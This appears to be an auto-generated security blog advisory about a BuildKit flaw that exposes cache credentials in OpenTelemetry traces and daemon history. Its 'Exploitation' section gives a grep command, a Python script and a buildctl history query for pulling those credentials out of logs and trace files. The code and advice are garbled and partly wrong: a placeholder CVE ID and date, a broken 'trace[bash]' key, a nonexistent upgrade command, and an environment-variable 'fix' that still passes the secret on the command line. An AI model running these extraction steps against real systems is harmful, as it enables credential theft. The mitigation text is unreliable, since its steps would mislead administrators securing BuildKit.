BuildKit, Information Disclosure, CVE-2024-XXXX (Critical)

By /

How the CVE Works:

CVE-2024-XXXX is a critical vulnerability in BuildKit, a toolkit for building container images. The issue arises when cache backend credentials are configured by setting secrets directly as attribute values in `cache-to` or `cache-from` configurations. These sensitive values can be inadvertently captured in OpenTelemetry traces, which are part of the arguments and flags for traced CLI commands. This exposes secure tokens and credentials to potential attackers if the traces are not properly secured. OpenTelemetry traces are also stored in BuildKit daemon’s history records, further increasing the risk of unauthorized access. The vulnerability does not affect tokens passed via environment variables or registry authentication.

DailyCVE Form:

Platform: BuildKit
Version: < v0.21.3
Vulnerability: Information Disclosure
Severity: Critical
Date: 2024-XX-XX

What Undercode Say:

Exploitation:

1. Exploit Command:

Attackers can extract sensitive credentials from OpenTelemetry traces or BuildKit history records using:

grep -r "cache-to" /path/to/buildkit/logs

This searches for cached credentials in logs.

2. Code to Extract Traces:

import json
with open("/path/to/otel/traces.json", "r") as f:
traces = json.load(f)
for trace in traces:
if "cache-to" in trace[bash]:
print(trace[bash])

This script reads OpenTelemetry traces to identify exposed credentials.

3. Exploit via BuildKit History:

Attackers can query BuildKit history records using:

buildctl debug history --format json | jq '.[] | select(.args | contains("cache-to"))'

This filters history records for sensitive data.

Protection:

1. Update BuildKit:

Upgrade to Buildx v0.21.3 or later:

docker buildx upgrade

2. Secure Traces:

Encrypt OpenTelemetry traces using:

exporters:
otlp:
endpoint: "otel-collector:4317"
headers:
authorization: "Bearer <secure-token>"

3. Avoid CLI Arguments for Secrets:

Use environment variables instead:

export CACHE_CREDENTIALS="secure-token"
docker buildx build --cache-to type=gha,url=$CACHE_CREDENTIALS .

4. Restrict Access to BuildKit Logs:

Set strict permissions on BuildKit logs:

chmod 600 /var/lib/buildkit/.log

5. Monitor for Unauthorized Access:

Use auditd to monitor BuildKit logs:

auditctl -w /var/lib/buildkit/ -p rwxa -k buildkit-access

6. Patch References:

Apply the official patch from the BuildKit GitHub repository:

git clone https://github.com/moby/buildkit.git
cd buildkit
git checkout v0.21.3

By following these steps, users can mitigate the risks associated with CVE-2024-XXXX and secure their BuildKit environments.

References:

Reported By: https://github.com/advisories/GHSA-m4gq-fm9h-8q75
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top